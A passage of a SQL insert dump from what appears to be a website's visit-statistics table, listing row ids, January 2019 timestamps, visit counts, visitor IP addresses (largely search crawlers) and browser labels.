ther'),(369091,1547268398,1,1,0,0,'54.36.148.136','other'),(369092,1547268715,1,1,0,0,'5.45.207.19','other'),(369093,1547268840,1,1,0,0,'54.36.148.171','other'),(369094,1547269037,1,1,0,0,'46.229.168.132','other'),(369095,1547269047,2,2,0,0,'95.213.141.126','opera'),(369096,1547269192,1,1,0,0,'46.229.168.150','other'),(369097,1547269238,1,1,0,0,'141.8.142.103','other'),(369098,1547269424,7,7,0,0,'216.244.66.241','other'),(369099,1547269516,1,1,0,0,'54.36.148.109','other'),(369100,1547269615,1,1,0,0,'66.249.66.157','chrome'),(369101,1547269616,1,1,0,0,'66.249.66.154','chrome'),(369102,1547269669,1,1,0,0,'95.108.181.54','other'),(369103,1547269672,3,3,0,0,'178.154.244.11','other'),(369104,1547269772,1,1,0,0,'54.36.148.83','other'),(369105,1547269782,1,1,0,0,'157.55.39.76','other'),(369106,1547269786,1,1,0,0,'66.249.66.156','chrome'),(369107,1547269788,3,3,0,0,'5.45.207.79','other'),(369108,1547269926,1,1,0,0,'87.250.224.65','other'),(369109,1547270280,1,1,0,0,'54.36.148.106','other'),(369110,1547270313,1,1,0,0,'46.229.168.129','other'),(369111,1547270315,1,1,0,0,'46.229.168.145','other'),(369112,1547270341,7,7,0,0,'216.244.66.241','other'),(369113,1547270586,1,1,0,0,'54.36.148.175','other'),(369114,1547270865,1,1,0,0,'54.36.148.147','other'),(369115,1547270885,2,2,0,0,'40.77.167.127','other'),(369116,1547270926,1,1,0,0,'66.249.66.157','chrome'),(369118,1547270974,1,1,0,0,'54.36.149.67','other'),(369119,1547271250,1,1,0,0,'54.36.148.227','other'),(369120,1547271256,1,1,0,0,'54.36.148.16','other'),(369121,1547271339,1,1,0,0,'54.36.149.89','other'),(369122,1547271408,4,4,0,0,'216.244.66.241','other'),(369123,1547271768,1,1,0,0,'54.36.149.15','other'),(369124,1547271911,1,1,0,0,'54.36.148.57','other'),(369125,1547271973,1,1,0,0,'54.36.148.74','other'),(369126,1547271993,1,1,0,0,'54.36.148.11','other'),(369127,1547272312,1,1,0,0,'66.249.66.57','chrome'),(369129,1547272326,1,1,0,0,'54.36.149.20','other'),(369130,1547272429,4,4,0,0,'216.244.66.241','other'),(369131,1547272515,1,1,0,0,'54.36.149.87','other'),(369132,1547272652,1,1,0,0,'54.36.148.129','other'),(369133,1547272722,2,2,0,0,'54.36.148.18','other'),(369134,1547272780,1,1,0,0,'46.229.168.145','other'),(369135,1547272942,1,1,0,0,'54.36.149.94','other'),(369136,1547273048,1,1,0,0,'54.36.149.21','other'),(369137,1547273162,2,2,0,0,'66.249.66.154','chrome'),(369138,1547273181,1,1,0,0,'54.36.149.2','other'),(369139,1547273206,1,1,0,0,'66.249.66.152','chrome'),(369140,1547273391,1,1,0,0,'54.36.149.36','other'),(369141,1547273455,1,1,0,0,'66.249.66.155','chrome'),(369142,1547273462,1,1,0,0,'54.36.148.130','other'),(369143,1547273722,1,1,0,0,'66.249.66.61','chrome'),(369144,1547273723,2,2,0,0,'66.249.66.44','chrome'),(369145,1547273761,1,1,0,0,'54.36.148.236','other'),(369146,1547273961,1,1,0,0,'54.36.148.21','other'),(369147,1547274043,2,2,0,0,'52.53.201.78','chrome'),(369148,1547274381,1,1,0,0,'46.229.168.147','other'),(369149,1547274556,1,1,0,0,'40.77.167.127','other'),(369150,1547274571,1,1,0,0,'54.36.149.25','other'),(369151,1547274594,2,2,0,0,'54.36.148.98','other'),(369152,1547274695,1,1,0,0,'54.36.148.176','other'),(369153,1547275018,8,8,0,0,'216.244.66.241','other'),(369154,1547275127,1,1,0,0,'157.55.39.161','other'),(369155,1547275298,1,1,0,0,'54.36.148.230','other'),(369156,1547275386,1,1,0,0,'66.249.66.154','chrome'),(369157,1547275511,1,1,0,0,'40.77.167.127','other'),(369158,1547275641,1,1,0,0,'95.163.255.67','other'),(369159,1547275643,1,1,0,0,'95.163.255.69','other'),(369160,1547276477,1,1,0,0,'8.29.198.25','other'),(369161,1547276646,1,1,0,0,'54.36.148.215','other'),(369162,1547276759,1,1,0,0,'157.55.39.154','other'),(369163,1547276949,1,1,0,0,'66.249.66.44','chrome'),(369164,1547277011,1,1,0,0,'54.36.148.125','other'),(369165,1547277023,9,9,0,0,'216.244.66.241','other'),(369166,1547277108,1,1,0,0,'54.36.148.22','other'),(369167,1547277130,1,1,0,0,'54.36.148.188','other'),(369168,1547277585,1,1,0,0,'8.29.198.25','other'),(369169,1547277784,1,1,0,0,'46.229.168.129','other'),(369170,1547277811,1,1,0,0,'54.36.149.105','other'),(369171,1547278021,1,1,0,0,'54.36.148.132','other'),(369172,1547278067,8,8,0,0,'216.244.66.241','other'),(369173,1547278169,1,1,0,0,'66.102.9.38','chrome'),(369174,1547278170,1,1,0,0,'66.102.9.58','chrome'),(369175,1547278224,1,1,0,0,'54.36.148.243','other'),(369176,1547278683,1,1,0,0,'46.229.168.148','other'),(369177,1547278811,1,1,0,0,'54.36.148.250','other'),(369178,1547279129,1,1,0,0,'180.76.15.29','other'),(369179,1547279130,1,1,0,0,'180.76.15.151','other'),(369180,1547279243,3,3,0,0,'216.244.66.241','other'),(369181,1547279476,1,1,0,0,'54.36.149.66','other'),(369182,1547279939,1,1,0,0,'66.249.66.152','chrome'),(369183,1547280091,1,1,0,0,'54.36.148.176','other'),(369184,1547280148,1,1,0,0,'54.36.148.147','other'),(369185,1547280559,1,1,0,0,'54.36.148.245','other'),(369186,1547280582,8,8,0,0,'216.244.66.241','other'),(369187,1547280627,1,1,0,0,'54.36.148.71','other'),(369188,1547280728,1,1,0,0,'54.36.148.35','other'),(369189,1547281071,1,1,0,0,'54.36.148.143','other'),(369190,1547281118,1,1,0,0,'54.36.148.215','other'),(369191,1547281200,1,1,0,0,'157.55.39.105','other'),(369192,1547281926,2,2,0,0,'40.77.167.204','other'),(369193,1547281937,1,1,0,0,'46.229.168.134','other'),(369194,1547282116,1,1,0,0,'66.249.66.156','chrome'),(369196,1547282268,1,1,0,0,'54.36.148.69','other'),(369197,1547282413,1,1,0,0,'216.244.66.241','other'),(369198,1547283060,2,2,0,0,'91.196.178.80','firefox'),(369199,1547283295,1,1,0,0,'54.36.149.53','other'),(369200,1547283387,5,5,0,0,'216.244.66.241','other'),(369201,1547283449,1,1,0,0,'66.249.66.152','chrome'),(369202,1547283646,1,1,0,0,'54.36.148.223','other'),(369203,1547283780,1,1,0,0,'66.249.66.154','chrome'),(369204,1547283812,1,1,0,0,'54.36.148.88','other'),(369205,1547283882,1,1,0,0,'66.249.66.155','chrome'),(369206,1547283883,1,1,0,0,'66.249.66.218','chrome'),(369207,1547283938,1,1,0,0,'54.36.148.207','other'),(369208,1547284004,1,1,0,0,'54.36.149.93','other'),(369209,1547284346,1,1,0,0,'54.36.148.176','other'),(369210,1547284490,1,1,0,0,'54.36.148.215','other'),(369211,1547284593,1,1,0,0,'54.36.149.104','other'),(369212,1547284742,1,1,0,0,'213.180.203.9','other'),(369213,1547284773,2,2,0,0,'141.8.142.103','other'),(369214,1547284859,2,2,0,0,'5.45.207.79','other'),(369215,1547284868,1,1,0,0,'54.36.148.233','other'),(369216,1547284903,1,1,0,0,'178.154.244.11','other'),(369217,1547284916,1,1,0,0,'216.244.66.241','other'),(369218,1547284931,1,1,0,0,'54.36.149.2','other'),(369219,1547285266,1,1,0,0,'5.45.207.19','other'),(369220,1547285308,1,1,0,0,'180.76.15.155','other'),(369221,1547285309,1,1,0,0,'180.76.15.139','other'),(369222,1547285355,1,1,0,0,'54.36.148.132','other'),(369223,1547285519,1,1,0,0,'66.249.66.152','chrome'),(369224,1547285828,1,1,0,0,'178.154.244.11','other'),(369225,1547285834,1,1,0,0,'54.36.148.99','other'),(369226,1547286076,1,1,0,0,'46.229.168.134','other'),(369227,1547286150,9,9,0,0,'216.244.66.241','other'),(369228,1547286169,1,1,0,0,'207.46.13.63','other'),(369229,1547286490,1,1,0,0,'54.36.149.11','other'),(369230,1547286507,1,1,0,0,'54.36.149.92','other'),(369231,1547286539,1,1,0,0,'37.54.253.225','firefox'),(369232,1547286640,1,1,0,0,'54.36.149.37','other'),(369233,1547287096,2,2,0,0,'207.46.13.63','other'),(369234,1547287124,1,1,0,0,'66.249.66.152','chrome'),(369235,1547287136,4,4,0,0,'216.244.66.241','other'),(369236,1547287182,1,1,0,0,'66.249.66.42','chrome'),(369237,1547287240,1,1,0,0,'54.36.148.212','other'),(369238,1547287309,1,1,0,0,'180.76.15.141','other'),(369239,1547287312,1,1,0,0,'180.76.15.6','other'),(369241,1547287314,1,1,0,0,'8.29.198.26','other'),(369242,1547287442,1,1,0,0,'54.36.148.180','other'),(369243,1547287627,1,1,0,0,'54.36.148.150','other'),(369244,1547287644,1,1,0,0,'54.36.148.89','other'),(369245,1547287652,1,1,0,0,'13.66.139.0','other'),(369246,1547287815,1,1,0,0,'54.36.148.37','other'),(369247,1547288205,1,1,0,0,'54.36.148.190','other'),(369248,1547288348,1,1,0,0,'54.36.149.45','other'),(369249,1547288410,1,1,0,0,'8.29.198.25','other'),(369250,1547288472,1,1,0,0,'54.36.148.17','other'),(369251,1547288936,6,6,0,0,'216.244.66.241','other'),(369252,1547289092,1,1,0,0,'66.249.66.154','chrome'),(369253,1547289095,1,1,0,0,'54.36.149.14','other'),(369254,1547289235,1,1,0,0,'54.36.148.87','other'),(369255,1547289369,2,2,0,0,'37.53.89.92','chrome'),(369256,1547289606,4,4,0,0,'69.58.178.56','other'),(369257,1547289624,1,1,0,0,'54.36.148.127','other'),(369258,1547289792,2,2,0,0,'207.46.13.63','other'),(369259,1547289912,3,3,0,0,'216.244.66.241','other'),(369260,1547290275,1,1,0,0,'54.36.148.157','other'),(369261,1547290624,1,1,0,0,'54.36.148.118','other'),(369262,1547290729,1,1,0,0,'207.46.13.63','other'),(369263,1547291019,1,1,0,0,'54.36.149.89','other'),(369264,1547291703,1,1,0,0,'141.8.142.103','other'),(369265,1547291714,1,1,0,0,'54.36.149.62','other'),(369266,1547291825,1,1,0,0,'66.249.66.154','chrome'),(369267,1547291883,2,2,0,0,'66.249.66.40','chrome'),(369268,1547291927,2,2,0,0,'216.244.66.241','other'),(369269,1547291959,2,2,0,0,'66.249.66.152','chrome'),(369270,1547292063,1,1,0,0,'54.36.148.88','other'),(369271,1547292185,1,1,0,0,'54.36.149.33','other'),(369272,1547292292,1,1,0,0,'157.55.39.140','other'),(369273,1547292405,1,1,0,0,'66.249.66.157','chrome'),(369275,1547292512,1,1,0,0,'207.46.13.63','other'),(369276,1547292709,1,1,0,0,'40.77.167.204','other'),(369277,1547293026,1,1,0,0,'54.36.148.242','other'),(369278,1547293061,1,1,0,0,'54.36.149.11','other'),(369279,1547293073,1,1,0,0,'66.249.66.155','chrome'),(369280,1547293074,3,3,0,0,'66.249.66.156','chrome'),(369281,1547293235,1,1,0,0,'66.249.66.154','chrome'),(369282,1547293318,4,4,0,0,'157.55.39.140','other'),(369283,1547293498,1,1,0,0,'5.45.207.79','other'),(369284,1547293673,1,1,0,0,'66.249.66.152','chrome'),(369285,1547293712,1,1,0,0,'87.250.224.47','other'),(369286,1547293756,1,1,0,0,'178.154.244.11','other'),(369287,1547293911,2,2,0,0,'5.45.207.19','other'),(369288,1547293974,2,2,0,0,'207.46.13.63','other'),(369289,1547294284,1,1,0,0,'66.249.66.61','chrome'),(369290,1547294285,1,1,0,0,'66.249.66.40','chrome'),(369291,1547294496,3,3,0,0,'216.244.66.241','other'),(369292,1547294517,1,1,0,0,'5.45.207.79','other'),(369293,1547294602,2,2,0,0,'46.211.119.238','chrome'),(369294,1547294640,2,2,0,0,'66.249.66.157','chrome'),(369295,1547294706,1,1,0,0,'178.154.244.11','other'),(369296,1547294983,1,1,0,0,'54.36.148.186','other'),(369297,1547295166,1,1,0,0,'54.36.149.67','other'),(369298,1547295202,3,3,0,0,'66.249.66.152','chrome'),(369299,1547295260,1,1,0,0,'54.36.149.14','other'),(369300,1547295379,2,2,0,0,'66.249.66.42','chrome'),(369301,1547295424,10,10,0,0,'216.244.66.241','other'),(369302,1547295456,2,2,0,0,'37.53.89.92','chrome'),(369303,1547295640,1,1,0,0,'54.36.148.147','other'),(369304,1547295730,1,1,0,0,'66.249.66.154','chrome'),(369305,1547296081,1,1,0,0,'66.249.66.40','chrome'),(369306,1547296384,1,1,0,0,'54.36.148.155','other'),(369307,1547296708,1,1,0,0,'54.36.149.92','other'),(369308,1547296709,1,1,0,0,'54.36.148.126','other'),(369309,1547297239,1,1,0,0,'66.249.66.157','chrome'),(369310,1547297240,1,1,0,0,'66.249.66.156','chrome'),(369311,1547297262,3,3,0,0,'216.244.66.241','other'),(369312,1547297713,1,1,0,0,'54.36.148.173','other'),(369313,1547298154,1,1,0,0,'8.29.198.27','other'),(369314,1547298224,11,11,0,0,'216.244.66.241','other'),(369315,1547298380,1,1,0,0,'37.73.81.253','chrome'),(369316,1547298444,1,1,0,0,'54.36.148.195','other'),(369317,1547298506,1,1,0,0,'54.36.148.129','other'),(369318,1547299095,1,1,0,0,'54.36.149.87','other'),(369319,1547299099,1,1,0,0,'46.229.168.146','other'),(369320,1547299242,1,1,0,0,'8.29.198.26','other'),(369321,1547299318,2,2,0,0,'66.249.66.156','chrome'),(369322,1547299373,1,1,0,0,'66.249.66.157','chrome'),(369323,1547299819,1,1,0,0,'66.249.66.152','chrome'),(369324,1547299899,1,1,0,0,'54.36.148.161','other'),(369325,1547299938,1,1,0,0,'91.196.178.59','chrome'),(369326,1547299939,2,2,0,0,'46.211.134.195','chrome'),(369327,1547300013,1,1,0,0,'54.36.149.95','other'),(369328,1547300042,4,4,0,0,'216.244.66.241','other'),(369329,1547300062,1,1,0,0,'157.55.39.140','other'),(369330,1547300332,1,1,0,0,'54.36.149.13','other'),(369331,1547300373,1,1,0,0,'66.249.66.154','chrome'),(369332,1547300471,1,1,0,0,'54.36.148.23','other'),(369333,1547301058,1,1,0,0,'54.36.148.191','other'),(369334,1547301139,6,6,0,0,'216.244.66.241','other'),(369335,1547301307,1,1,0,0,'54.36.148.240','other'),(369336,1547301395,1,1,0,0,'54.36.148.69','other'),(369337,1547301713,1,1,0,0,'46.229.168.130','other'),(369338,1547301861,2,2,0,0,'162.210.196.98','other'),(369339,1547301926,1,1,0,0,'54.36.149.101','other'),(369340,1547302036,2,2,0,0,'5.45.207.19','other'),(369341,1547302037,1,1,0,0,'95.108.213.4','other'),(369342,1547302042,2,2,0,0,'178.154.244.11','other'),(369343,1547302328,1,1,0,0,'46.229.168.149','other'),(369344,1547302596,2,2,0,0,'66.249.66.152','chrome'),(369345,1547302624,1,1,0,0,'54.36.148.30','other'),(369346,1547302854,1,1,0,0,'87.250.224.47','other'),(369347,1547302888,3,3,0,0,'216.244.66.241','other'),(369348,1547303042,1,1,0,0,'66.249.66.157','chrome'),(369349,1547303240,2,2,0,0,'66.249.66.42','chrome'),(369350,1547303249,1,1,0,0,'54.36.149.25','other'),(369351,1547303342,2,2,0,0,'178.154.244.11','other'),(369352,1547303496,1,1,0,0,'141.8.142.103','other'),(369353,1547303516,1,1,0,0,'54.36.148.28','other'),(369354,1547303527,1,1,0,0,'54.36.148.237','other'),(369355,1547303622,1,1,0,0,'5.45.207.19','other'),(369356,1547303915,9,9,0,0,'136.243.37.219','other'),(369357,1547303995,1,1,0,0,'66.249.66.61','chrome'),(369358,1547304278,1,1,0,0,'66.249.66.42','chrome'),(369359,1547304299,4,4,0,0,'193.200.241.230','other'),(369360,1547304521,1,1,0,0,'195.5.29.112','chrome'),(369361,1547304535,1,1,0,0,'54.36.149.74','other'),(369362,1547304588,2,2,0,0,'107.23.176.162','other'),(369363,1547304615,1,1,0,0,'66.249.66.156','chrome'),(369364,1547305167,1,1,0,0,'46.229.168.139','other'),(369365,1547305359,1,1,0,0,'54.36.149.59','other'),(369366,1547305478,1,1,0,0,'54.36.148.25','other'),(369367,1547305673,10,10,0,0,'216.244.66.241','other'),(369368,1547305965,1,1,0,0,'54.36.148.26','other'),(369369,1547306596,3,3,0,0,'216.244.66.241','other'),(369370,1547306839,2,2,0,0,'46.211.26.55','chrome'),(369371,1547307088,1,1,0,0,'54.36.148.226','other'),(369372,1547307138,1,1,0,0,'66.249.69.202','chrome'),(369373,1547307151,1,1,0,0,'66.249.69.200','chrome'),(369374,1547307331,1,1,0,0,'54.36.148.89','other'),(369375,1547307377,1,1,0,0,'107.23.176.162','other'),(369376,1547307420,1,1,0,0,'54.36.148.22','other'),(369377,1547307793,1,1,0,0,'46.229.168.134','other'),(369378,1547307862,1,1,0,0,'54.36.149.77','other'),(369379,1547307929,1,1,0,0,'178.154.244.11','other'),(369380,1547307950,1,1,0,0,'66.249.75.17','chrome'),(369381,1547307951,1,1,0,0,'66.249.75.21','chrome'),(369382,1547307999,1,1,0,0,'54.36.148.211','other'),(369383,1547308149,1,1,0,0,'54.36.148.108','other'),(369384,1547308181,1,1,0,0,'157.55.39.232','other'),(369385,1547308317,1,1,0,0,'54.36.148.49','other'),(369386,1547308468,5,5,0,0,'216.244.66.241','other'),(369387,1547308541,1,1,0,0,'54.36.148.239','other'),(369388,1547308732,1,1,0,0,'66.249.75.20','chrome'),(369389,1547308985,1,1,0,0,'54.36.148.157','other'),(369390,1547308993,1,1,0,0,'8.29.198.27','other'),(369391,1547309078,1,1,0,0,'54.36.148.24','other'),(369392,1547309239,1,1,0,0,'54.36.149.54','other'),(369393,1547309361,1,1,0,0,'66.249.75.21','chrome'),(369394,1547309450,4,4,0,0,'216.244.66.241','other'),(369395,1547310007,1,1,0,0,'178.255.215.94','other'),(369396,1547310076,1,1,0,0,'8.29.198.27','other'),(369397,1547310494,1,1,0,0,'54.36.148.146','other'),(369398,1547310587,1,1,0,0,'54.36.148.218','other'),(369399,1547310603,2,2,0,0,'66.249.75.21','chrome'),(369400,1547310693,1,1,0,0,'54.36.148.221','other'),(369401,1547311092,1,1,0,0,'54.36.149.25','other'),(369402,1547311246,10,10,0,0,'216.244.66.241','other'),(369403,1547311438,1,1,0,0,'54.36.149.43','other'),(369404,1547311535,1,1,0,0,'54.36.149.96','other'),(369405,1547311537,1,1,0,0,'54.36.148.51','other'),(369406,1547311673,1,1,0,0,'54.36.148.112','other'),(369407,1547311918,1,1,0,0,'54.36.148.183','other'),(369408,1547312095,1,1,0,0,'54.36.148.219','other'),(369409,1547312183,5,5,0,0,'216.244.66.241','other'),(369410,1547312215,1,1,0,0,'13.57.233.99','chrome'),(369411,1547312264,1,1,0,0,'46.229.168.142','other'),(369412,1547312367,1,1,0,0,'5.45.207.19','other'),(369413,1547312551,1,1,0,0,'54.36.149.66','other'),(369414,1547312680,1,1,0,0,'5.45.207.79','other'),(369415,1547312751,1,1,0,0,'95.163.255.109','other'),(369416,1547312801,1,1,0,0,'54.36.149.45','other'),(369417,1547312908,1,1,0,0,'54.36.149.7','other'),(369418,1547313035,1,1,0,0,'95.163.255.115','other'),(369419,1547313185,1,1,0,0,'54.36.148.171','other'),(369420,1547313646,1,1,0,0,'54.36.149.98','other'),(369421,1547313734,1,1,0,0,'66.249.69.202','chrome'),(369422,1547313747,2,2,0,0,'66.249.75.15','chrome'),(369424,1547313829,1,1,0,0,'157.55.39.79','other'),(369425,1547313901,6,6,0,0,'207.46.13.63','other'),(369426,1547313903,1,1,0,0,'178.154.244.11','other'),(369427,1547314047,4,4,0,0,'216.244.66.241','other'),(369428,1547314442,1,1,0,0,'46.229.168.151','other'),(369429,1547314545,1,1,0,0,'54.36.149.84','other'),(369430,1547314569,2,2,0,0,'66.249.75.21','chrome'),(369431,1547314684,1,1,0,0,'46.229.168.138','other'),(369432,1547314711,1,1,0,0,'46.229.168.133','other'),(369433,1547314773,1,1,0,0,'46.229.168.154','other'),(369434,1547314950,1,1,0,0,'54.36.149.31','other'),(369435,1547314974,4,4,0,0,'216.244.66.241','other'),(369436,1547315186,1,1,0,0,'46.229.168.141','other'),(369437,1547315479,1,1,0,0,'66.249.75.17','chrome'),(369438,1547315480,1,1,0,0,'66.249.75.21','chrome'),(369439,1547315538,1,1,0,0,'54.36.148.52','other'),(369440,1547315607,1,1,0,0,'66.249.75.22','chrome'),(369441,1547315761,1,1,0,0,'54.36.148.213','other'),(369442,1547315900,2,2,0,0,'66.249.75.20','chrome'),(369443,1547316073,1,1,0,0,'54.36.149.66','other'),(369444,1547316489,1,1,0,0,'54.36.148.240','other'),(369445,1547316594,1,1,0,0,'54.36.148.95','other'),(369446,1547316600,1,1,0,0,'54.36.148.104','other'),(369447,1547316896,6,6,0,0,'216.244.66.241','other'),(369448,1547316950,1,1,0,0,'46.211.52.92','chrome'),(369449,1547317007,1,1,0,0,'54.36.148.244','other'),(369450,1547317199,1,1,0,0,'66.249.75.22','chrome'),(369451,1547317211,1,1,0,0,'54.36.148.212','other'),(369452,1547317400,1,1,0,0,'54.36.149.46','other'),(369453,1547317766,1,1,0,0,'54.36.148.104','other'),(369454,1547317815,1,1,0,0,'54.36.148.119','other'),(369455,1547318022,3,3,0,0,'216.244.66.241','other'),(369456,1547318076,1,1,0,0,'54.36.148.30','other'),(369457,1547318134,1,1,0,0,'54.36.149.107','other'),(369458,1547318308,1,1,0,0,'66.249.75.21','chrome'),(369459,1547318327,2,2,0,0,'66.249.75.20','chrome'),(369460,1547319126,1,1,0,0,'54.36.148.106','other'),(369461,1547319210,1,1,0,0,'54.36.149.95','other'),(369462,1547319295,1,1,0,0,'195.114.136.163','chrome'),(369463,1547319425,1,1,0,0,'54.36.149.62','other'),(369464,1547319712,1,1,0,0,'54.36.149.7','other'),(369465,1547319733,4,4,0,0,'216.244.66.241','other'),(369466,1547319830,1,1,0,0,'8.29.198.26','other'),(369467,1547319919,1,1,0,0,'66.249.69.217','chrome'),(369468,1547319920,1,1,0,0,'66.249.69.202','chrome'),(369469,1547319964,2,2,0,0,'66.249.69.204','chrome'),(369470,1547320109,1,1,0,0,'37.144.52.194','chrome'),(369471,1547320182,2,2,0,0,'178.133.86.246','chrome'),(369472,1547320183,1,1,0,0,'54.36.148.253','other'),(369473,1547320620,1,1,0,0,'46.229.168.132','other'),(369474,1547320661,2,2,0,0,'216.244.66.241','other'),(369475,1547320760,1,1,0,0,'54.36.148.167','other'),(369476,1547320896,1,1,0,0,'8.29.198.26','other'),(369477,1547320926,2,2,0,0,'54.36.148.34','other'),(369478,1547320957,1,1,0,0,'54.36.148.169','other'),(369479,1547321131,1,1,0,0,'54.36.149.31','other'),(369480,1547321139,1,1,0,0,'66.249.75.21','chrome'),(369481,1547321174,1,1,0,0,'54.36.149.15','other'),(369482,1547321605,1,1,0,0,'54.36.148.221','other'),(369483,1547321643,1,1,0,0,'54.36.149.21','other'),(369484,1547321978,4,4,0,0,'178.154.244.11','other'),(369485,1547321979,3,3,0,0,'141.8.142.103','other'),(369486,1547321981,1,1,0,0,'5.45.207.19','other'),(369487,1547322366,2,2,0,0,'207.46.13.63','other'),(369488,1547322392,1,1,0,0,'54.36.148.160','other'),(369489,1547322394,1,1,0,0,'66.249.69.221','chrome'),(369491,1547322464,1,1,0,0,'178.95.203.83','chrome'),(369492,1547322540,1,1,0,0,'87.250.224.47','other'),(369493,1547322566,7,7,0,0,'216.244.66.241','other'),(369494,1547322639,1,1,0,0,'54.36.149.89','other'),(369495,1547322658,1,1,0,0,'54.36.148.198','other'),(369496,1547322710,1,1,0,0,'46.229.168.134','other'),(369497,1547322720,1,1,0,0,'66.249.69.200','chrome'),(369498,1547322766,1,1,0,0,'66.249.75.21','chrome'),(369499,1547322786,11,11,0,0,'157.55.39.140','other'),(369500,1547322886,1,1,0,0,'54.36.149.63','other'),(369501,1547322912,1,1,0,0,'54.36.149.70','other'),(369502,1547322930,1,1,0,0,'46.229.168.130','other'),(369503,1547323104,2,2,0,0,'95.163.255.108','other'),(369504,1547323142,2,2,0,0,'91.196.178.133','firefox'),(369505,1547323196,1,1,0,0,'107.23.176.162','other'),(369506,1547323438,1,1,0,0,'54.36.148.158','other'),(369507,1547323532,4,4,0,0,'216.244.66.241','other'),(369508,1547323580,1,1,0,0,'54.36.148.170','other'),(369509,1547323600,1,1,0,0,'54.36.148.17','other'),(369510,1547323827,1,1,0,0,'95.163.255.119','other'),(369511,1547323842,1,1,0,0,'95.163.255.105','other'),(369512,1547323887,1,1,0,0,'46.172.18.11','chrome'),(369513,1547323997,1,1,0,0,'157.55.39.79','other'),(369514,1547324007,2,2,0,0,'95.163.255.106','other'),(369515,1547324171,1,1,0,0,'95.163.255.108','other'),(369516,1547324220,1,1,0,0,'54.36.148.22','other'),(369517,1547324324,2,2,0,0,'95.163.255.104','other'),(369518,1547324360,1,1,0,0,'207.46.13.63','other'),(369519,1547324399,1,1,0,0,'54.36.148.235','other'),(369520,1547324577,1,1,0,0,'54.36.148.247','other'),(369521,1547324600,1,1,0,0,'54.36.149.80','other'),(369522,1547324606,1,1,0,0,'95.163.255.118','other'),(369523,1547324615,1,1,0,0,'66.249.69.202','chrome'),(369524,1547324673,1,1,0,0,'66.249.69.204','chrome'),(369525,1547324711,1,1,0,0,'46.229.168.138','other'),(369526,1547324766,1,1,0,0,'95.163.255.115','other'),(369527,1547324767,1,1,0,0,'66.249.75.20','chrome'),(369528,1547324792,1,1,0,0,'95.163.255.109','other'),(369529,1547324817,3,3,0,0,'66.249.75.21','chrome'),(369530,1547324831,1,1,0,0,'66.249.75.22','chrome'),(369531,1547324985,1,1,0,0,'54.36.149.59','other'),(369532,1547325199,1,1,0,0,'66.249.69.200','chrome'),(369533,1547325279,1,1,0,0,'157.55.39.140','other'),(369534,1547325422,12,12,0,0,'216.244.66.241','other'),(369535,1547325660,1,1,0,0,'5.45.207.79','other'),(369536,1547326206,1,1,0,0,'46.229.168.136','other'),(369537,1547326329,1,1,0,0,'66.249.69.221','chrome'),(369538,1547326330,2,2,0,0,'66.249.69.200','chrome'),(369539,1547326490,1,1,0,0,'216.244.66.241','other'),(369540,1547326583,2,2,0,0,'66.249.69.202','chrome'),(369541,1547326620,1,1,0,0,'54.36.149.6','other'),(369542,1547326761,1,1,0,0,'54.36.148.232','other'),(369543,1547327188,1,1,0,0,'66.249.69.204','chrome'),(369544,1547327456,1,1,0,0,'66.249.75.22','chrome'),(369545,1547327573,1,1,0,0,'13.66.139.0','other'),(369546,1547327684,2,2,0,0,'178.54.66.162','firefox'),(369547,1547327946,1,1,0,0,'157.55.39.140','other'),(369548,1547328199,1,1,0,0,'54.36.149.37','other'),(369549,1547328258,9,9,0,0,'216.244.66.241','other'),(369550,1547328591,2,2,0,0,'91.196.178.81','firefox'),(369551,1547328832,1,1,0,0,'54.36.148.109','other'),(369552,1547329219,1,1,0,0,'66.249.75.20','chrome'),(369553,1547329439,1,1,0,0,'54.36.148.170','other'),(369554,1547329485,2,2,0,0,'66.249.75.22','chrome'),(369555,1547329529,3,3,0,0,'216.244.66.241','other'),(369556,1547329538,3,3,0,0,'66.249.69.200','chrome'),(369557,1547329660,1,1,0,0,'54.36.148.111','other'),(369558,1547329774,1,1,0,0,'207.46.13.63','other'),(369559,1547329865,1,1,0,0,'54.36.148.114','other'),(369560,1547329868,2,2,0,0,'66.249.69.217','chrome'),(369562,1547329872,1,1,0,0,'54.36.149.82','other'),(369563,1547329894,1,1,0,0,'66.249.75.15','chrome'),(369564,1547330267,1,1,0,0,'54.36.148.23','other'),(369565,1547330462,1,1,0,0,'54.36.149.95','other'),(369566,1547330653,2,2,0,0,'178.154.244.11','other'),(369567,1547330665,1,1,0,0,'8.29.198.26','other'),(369568,1547331025,1,1,0,0,'46.229.168.146','other'),(369569,1547331026,1,1,0,0,'66.249.75.22','chrome'),(369570,1547331028,1,1,0,0,'46.229.168.132','other'),(369571,1547331038,8,8,0,0,'216.244.66.241','other'),(369572,1547331083,1,1,0,0,'66.249.69.200','chrome'),(369573,1547331087,1,1,0,0,'141.8.142.103','other'),(369574,1547331471,1,1,0,0,'54.36.148.125','other'),(369575,1547331493,1,1,0,0,'199.16.157.181','other'),(369576,1547331495,1,1,0,0,'199.16.157.180','other'),(369577,1547331536,1,1,0,0,'5.45.207.79','other'),(369578,1547331724,1,1,0,0,'8.29.198.26','other'),(369579,1547331877,2,2,0,0,'66.249.75.21','chrome'),(369580,1547332021,1,1,0,0,'95.67.81.164','other'),(369581,1547332082,1,1,0,0,'46.229.168.138','other'),(369582,1547332131,1,1,0,0,'54.36.148.155','other'),(369583,1547332172,3,3,0,0,'216.244.66.241','other'),(369584,1547332345,1,1,0,0,'157.55.39.110','other'),(369585,1547332407,1,1,0,0,'54.36.148.104','other'),(369586,1547332887,1,1,0,0,'46.229.168.129','other'),(369587,1547332889,1,1,0,0,'46.229.168.145','other'),(369588,1547332896,1,1,0,0,'88.99.2.203','other'),(369589,1547333000,1,1,0,0,'54.36.148.231','other'),(369590,1547333113,1,1,0,0,'66.249.75.15','chrome'),(369592,1547333416,1,1,0,0,'66.249.75.17','chrome'),(369593,1547333417,1,1,0,0,'66.249.75.22','chrome'),(369594,1547333504,2,2,0,0,'66.249.69.202','chrome'),(369595,1547333739,1,1,0,0,'54.36.148.86','other'),(369596,1547333796,9,9,0,0,'216.244.66.241','other'),(369597,1547334067,1,1,0,0,'54.36.148.225','other'),(369598,1547334322,1,1,0,0,'54.36.148.180','other'),(369599,1547334570,1,1,0,0,'54.36.148.132','other'),(369600,1547334664,3,3,0,0,'144.76.81.72','other'),(369601,1547334947,1,1,0,0,'66.249.69.204','chrome'),(369602,1547335055,1,1,0,0,'141.8.142.103','other'),(369603,1547335164,1,1,0,0,'54.36.148.241','other'),(369604,1547335196,2,2,0,0,'66.249.75.16','chrome'),(369605,1547335197,2,2,0,0,'66.249.75.21','chrome'),(369606,1547335353,1,1,0,0,'54.82.55.233','other'),(369607,1547335632,1,1,0,0,'46.229.168.153','other'),(369608,1547335760,1,1,0,0,'6